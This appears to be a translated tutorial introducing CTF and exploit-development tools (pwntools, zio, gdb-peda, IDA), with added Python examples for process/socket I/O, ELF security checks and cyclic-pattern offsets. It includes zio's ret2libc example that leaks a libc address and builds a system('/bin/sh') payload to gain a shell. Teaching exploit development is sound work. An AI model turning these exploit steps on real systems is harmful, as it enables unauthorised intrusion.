Several common tools for writing PoCs and exploits

1.pwntools

pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and aims to make writing exploits as simple and fast as possible.

pwntools is best supported on Ubuntu 12.04 and 14.04, but most of its functionality also works on Debian, Arch, FreeBSD, OSX and so on.

Install it with sudo pip install pwntools.

If the installation complains about a missing library, the fix is usually easy to find by searching for the error message.

After installation, run the following to check that it worked:

>>> import pwn
>>> pwn.asm("xor eax,eax")
'1\xc0'

If you get the same result (the two bytes 0x31 0xc0, shown as '1\xc0', are the encoding of xor eax,eax), the installation succeeded and the pwn module is ready to use.

2.zio

Like pwntools, zio is a Python library for writing exploits, and it makes switching an exploit between a local and a remote target easy. Install it with sudo pip install zio.

zio is an easy-to-use io library for pwning development, supporting a unified interface for local process pwning and TCP socket io.

The primary goal of zio is to provide a unified io interface between process stdin/stdout and TCP socket io. So when you have done local pwning development, you only need to change the io target to pwn the remote server.

The following code illustrates the basic idea:

from zio import *

if you_are_debugging_local_server_binary:
    io = zio('./buggy-server')            # used for local pwning development
elif you_are_pwning_remote_server:
    io = zio(('1.2.3.4', 1337))           # used to exploit remote service

io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()

A fuller example from the zio README (Python 2; l32 packs an int into, or unpacks it from, 4 little-endian bytes, and the libc offsets are specific to the target that example was written against):

from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))           # the same script against the remote instance

# interaction specific to the README's buggy-server target
for i in xrange(1337):
    io.writeline('add ' + str(i))
    io.read_until('>>')

# leak a libc pointer that the server prints right after our 49 'A's
io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
# ret2libc: padding, then system(), a junk return address, then the "/bin/sh" pointer
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()
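As an added example (not code from pwntools or zio), here is the idea both libraries share, a "tube" that gives a local process and a remote TCP service the same read/write interface, written in pure Python 3, together with the leak / rebase / payload steps of the zio example above. The target is a constructed toy service that hands out a fake libc pointer and the libc offsets are simply the ones from the example above, so nothing here is a real exploit; the names Tube, p32, u32, TOY_SERVER and ret2libc are mine.

```python
# Added example, not code from pwntools or zio: a minimal pure-Python 3 "tube"
# giving a local process and a TCP service one interface (the idea behind both
# libraries). The toy target, leaked address and libc offsets are constructed.
import socket
import struct
import subprocess
import sys


def p32(value):
    """Pack an int into 4 little-endian bytes (pwntools p32 / zio l32)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Unpack 4 little-endian bytes into an int (pwntools u32 / zio l32)."""
    return struct.unpack("<I", data[:4])[0]


class Tube:
    """read / read_until / write over either a subprocess or a socket."""
    def __init__(self, target):
        self.buf = b""
        if isinstance(target, tuple):          # ("host", port): remote service
            self.sock, self.proc = socket.create_connection(target), None
        else:                                   # path or argv list: local process
            argv = target if isinstance(target, list) else [target]
            # bufsize=0: a read returns what the pipe has instead of waiting for 4096 bytes
            self.proc = subprocess.Popen(argv, stdin=subprocess.PIPE,
                                         stdout=subprocess.PIPE, bufsize=0)
            self.sock = None

    def _fill(self):
        data = self.sock.recv(4096) if self.sock else self.proc.stdout.read(4096)
        if not data:
            raise EOFError("target closed the connection")
        self.buf += data

    def write(self, data):
        data = data.encode() if isinstance(data, str) else data
        if self.sock:
            self.sock.sendall(data)
        else:
            self.proc.stdin.write(data)
            self.proc.stdin.flush()

    def writeline(self, data):
        self.write(data)
        self.write(b"\n")

    def read(self, n):
        while len(self.buf) < n:
            self._fill()
        out, self.buf = self.buf[:n], self.buf[n:]
        return out

    def read_until(self, delim):
        delim = delim.encode() if isinstance(delim, str) else delim
        while delim not in self.buf:
            self._fill()
        end = self.buf.index(delim) + len(delim)
        out, self.buf = self.buf[:end], self.buf[end:]
        return out

    def close(self):
        if self.sock:
            self.sock.close()
        else:
            self.proc.stdin.close()
            self.proc.wait()


# Constructed stand-in for a vulnerable service: a ">> " prompt, and on "leak"
# it writes a fake libc pointer so the exploit steps can be exercised offline.
FAKE_LEAK = 0xF7E0B960
TOY_SERVER = [sys.executable, "-u", "-c", r"""
import sys
out = sys.stdout.buffer
out.write(b">> "); out.flush()
for line in sys.stdin.buffer:
    cmd = line.strip()
    if cmd == b"leak":
        out.write((%d).to_bytes(4, "little"))
    elif cmd == b"exit":
        break
    out.write(b">> "); out.flush()
""" % FAKE_LEAK]


def ret2libc(io, leak_off=0x1A9960, system_off=0x3EA70, binsh_off=0x15FCBF):
    """The steps of the zio example above: leak, rebase libc, build the chain.
    Default offsets are the ones that example used and are libc-specific."""
    io.read_until(">> ")
    io.writeline("leak")
    libc_base = u32(io.read(4)) - leak_off
    io.read_until(">> ")
    # 64 bytes of padding, system(), a junk return address, the "/bin/sh" pointer
    payload = b"A" * 64 + p32(libc_base + system_off) + b"JJJJ" + p32(libc_base + binsh_off)
    io.writeline("exit")
    io.close()
    return libc_base, payload
```

Run it locally with ret2libc(Tube(TOY_SERVER)); the switch to a remote instance is the one-line change zio advertises, Tube((host, port)) in place of Tube(argv). The two details worth copying are bufsize=0 and the loop in _fill: reading a fixed size from a pipe in one call is the classic reason such scripts hang on a partial read.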

3.gdb+peda

I won't say much about gdb itself; see the series of articles at http://blog.csdn.net/haoel/article/details/2879, or the relevant part of my blog (mine is less detailed than that series).

peda (Python Exploit Development Assistance for GDB) is a gdb plugin written in Python that:

  • Enhances the display of gdb: colorizes and displays disassembly code, registers and memory information while debugging
  • Adds commands to support debugging and exploit development (for a full list of commands use peda help); the commands and what they do:
    • aslr -- Show/set ASLR setting of GDB
    • checksec -- Check for various security options of binary
    • dumpargs -- Display arguments passed to a function when stopped at a call instruction
    • dumprop -- Dump all ROP gadgets in specific memory range
    • elfheader -- Get headers information from debugged ELF file
    • elfsymbol -- Get non-debugging symbol information from an ELF file
    • lookup -- Search for all addresses/references to addresses which belong to a memory range
    • patch -- Patch memory start at an address with string/hexstring/int
    • pattern -- Generate, search, or write a cyclic pattern to memory
    • procinfo -- Display various info from /proc/pid/
    • pshow -- Show various PEDA options and other settings
    • pset -- Set various PEDA options and other settings
    • readelf -- Get headers information from an ELF file
    • ropgadget -- Get common ROP gadgets of binary or library
    • ropsearch -- Search for ROP gadgets in memory
    • searchmem|find -- Search for a pattern in memory; support regex search
    • shellcode -- Generate or download common shellcodes.
    • skeleton -- Generate python exploit code template
    • vmmap -- Get virtual mapping address ranges of section(s) in debugged process
    • xormem -- XOR a memory region with a key
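checksec and elfheader above work by reading the ELF headers. As an added example, not peda's code, the following pure-Python 3 script performs the same NX / PIE / RELRO / canary checks directly with struct on an ELF64 image; because no real binary comes with this page, build_elf constructs minimal header-only images so the parser can be exercised offline. The names checksec and build_elf are mine; the constants are from the ELF specification.

```python
# Added example, not peda's checksec: the checks behind `checksec` / `elfheader`
# done by parsing ELF64 headers with struct. build_elf() constructs minimal,
# non-loadable images shaped like a real binary's header area for testing.
import struct

EHDR_FMT = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, little-endian
PHDR_FMT = "<IIQQQQQQ"           # Elf64_Phdr
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4


def checksec(data):
    """Report NX / PIE / RELRO / canary for the ELF64 image in `data`.
    RELRO is 'Partial' when a PT_GNU_RELRO segment exists; telling Full from
    Partial needs DT_BIND_NOW in the dynamic section, which this example does
    not parse. The canary check is the usual symbol-name heuristic."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this example handles little-endian ELF64 only")
    ehdr = struct.unpack_from(EHDR_FMT, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = ehdr[1], ehdr[5], ehdr[9], ehdr[10]
    report = {
        "NX": False,                # no PT_GNU_STACK at all means an executable stack
        "PIE": e_type == ET_DYN,    # note: shared objects are ET_DYN as well
        "RELRO": "No",
        "CANARY": b"__stack_chk_fail" in data,
    }
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            report["NX"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            report["RELRO"] = "Partial"
    return report


def build_elf(pie, nx, relro, canary):
    """Constructed ELF64 image: one PT_LOAD plus the headers checksec looks at."""
    phdrs = [(PT_LOAD, PF_R | PF_X, 0, 0, 0, 0, 0, 0x1000)]
    phdrs.append((PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16))
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R, 0, 0, 0, 0, 0, 1))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELF64, little-endian, v1
    ehdr = struct.pack(EHDR_FMT, ident, ET_DYN if pie else ET_EXEC, 0x3E, 1,
                       0x1000, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    image = ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs)
    if canary:
        image += b"\0__stack_chk_fail\0"   # stands in for the .dynstr entry
    return image
```

checksec(open(path, "rb").read()) works on a real 64-bit Linux binary as well, with the two caveats in the docstring: Full RELRO is not distinguished, and a shared library will show as PIE because it too is ET_DYN.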

安装:

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

If everything went well, starting gdb now shows the prompt changed from (gdb) to gdb-peda$. I'm writing this post on Windows and installed peda on a separate Lubuntu 14.04 machine, so screenshots are inconvenient; apologies.

The README.md for peda on GitHub has a few screenshots, if you are interested: https://github.com/longld/peda

Some of peda's settings are also configurable:

~/.gdbinit:
# Source all settings from the peda dir
source ~/peda/peda.py
# These are other settings I have found useful
# Intel syntax is more readable
set disassembly-flavor intel
# When inspecting large portions of code the scrollbar works better than 'less'
set pagination off
# Keep a history of all the commands typed. Search is possible using ctrl-r
set history save on
set history filename ~/.gdb_history
set history size 32768
set history expansion on
Making the following modification to ~/peda/lib/config.py is also recommended:
-    "debug"     : ("off", "show detail error of peda commands, e.g: on|off"),
+    "debug"     : ("on", "show detail error of peda commands, e.g: on|off"),
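Review bot: patching ~/peda/lib/config.py inside the clone is lost the next time the tree is updated with git pull; since "debug" is an ordinary PEDA option, the same effect is available at runtime, or from ~/.gdbinit after the source line, with pset option debug on (the pset command in the list above), so no change to the tree is needed.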
  • General usage and features
  • The list of commands can be read by typing peda help
  • Peda has wrappers over many gdb commands, for example pdisas in place of disas; the peda versions colorize and annotate their output
  • There are three commands to show context:
    • context reg for the registers and flags
    • context code for disassembling around the current instruction pointer
    • context stack for examining the stack
  • There is also a command for all at once, context all, which is run by default whenever a breakpoint is hit
  • A lot of information is shown; addresses are color coded according to their origin: code/data/rodata
  • Peda also features smart dereferencing (telescoping): chains of pointers are followed and each level is displayed
  • Getting information about an address or register can be done with xinfo; the mapping it belongs to can be looked up with vmmap
  • Displaying all strings in the address space is done using strings
  • Searching for specific strings can be done with find
  • Sometimes you need to find a pointer to a specific string; you can use refsearch
  • Searching for specific instructions or chains of instructions is done using asmsearch (although it's not always accurate)

Exploit / reverse engineering specifics

  • Process info and security
  • ROP gadgets
  • Tracing calls
  • Tracing individual instructions: Peda can also infer the arguments to functions or the operands for comparisons and display them
  • Creating exploit patterns and searching for them in memory and registers
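Creating a pattern and searching for it (pattern create / pattern offset in peda, cyclic / cyclic_find in pwntools) is a de Bruijn sequence plus a lookup. As an added example, not peda's or pwntools' code, here is that mechanism in pure Python 3, with the crash simulated on a constructed frame layout rather than a real binary; the function names are mine and the 76-byte return-address offset is an arbitrary constructed value.

```python
# Added example, not peda's or pwntools' code: what `pattern create` /
# `pattern offset` (peda) and cyclic() / cyclic_find() (pwntools) do.
# The "crash" at the end is simulated on a constructed buffer layout.
import itertools
import string


def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Lazily generate the de Bruijn sequence B(k, n) (the FKM algorithm).
    Every substring of length n occurs exactly once, so any n bytes that end
    up in a register map back to a unique offset in the pattern."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern, like pattern create / cyclic(length)."""
    return "".join(itertools.islice(de_bruijn(n=n), length)).encode()


def cyclic_find(value, n=4):
    """Offset of `value` in the pattern, like pattern offset / cyclic_find.
    Accepts the n bytes themselves or an int as read from a register after a
    crash (converted little-endian, which is how it was laid out in memory).
    Returns -1 if the value is not part of the pattern."""
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    if isinstance(value, bytes):
        value = value.decode()
    if len(value) != n:
        raise ValueError("need exactly %d bytes" % n)
    window = ""
    for i, ch in enumerate(de_bruijn(n=n)):
        window = (window + ch)[-n:]
        if window == value:
            return i - n + 1
    return -1


def simulated_crash_pc(payload, ret_offset=76, n=4):
    """Constructed crash model: the saved return address sits `ret_offset`
    bytes into the overflowed buffer; return what lands in EIP/RIP."""
    return int.from_bytes(payload[ret_offset:ret_offset + n], "little")


def find_overflow_offset(ret_offset=76):
    """Send a pattern, read the faulting PC, recover the offset (76 here)."""
    pc = simulated_crash_pc(cyclic(200), ret_offset)
    return cyclic_find(pc)
```

With a real target the only difference is where the PC value comes from: the EIP/RIP shown in peda's context after the crash, passed to cyclic_find as an int, exactly as pattern offset takes it.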

More information: http://security.cs.pub.ro/hexcellents/wiki/kb/toolset/peda

4.IDA

IDA is far too capable to cover briefly in this article. I recommend working through The IDA Pro Book (《IDA pro权威指南》) together with plenty of hands-on practice; I think you will come to love IDA, because she really is captivating.

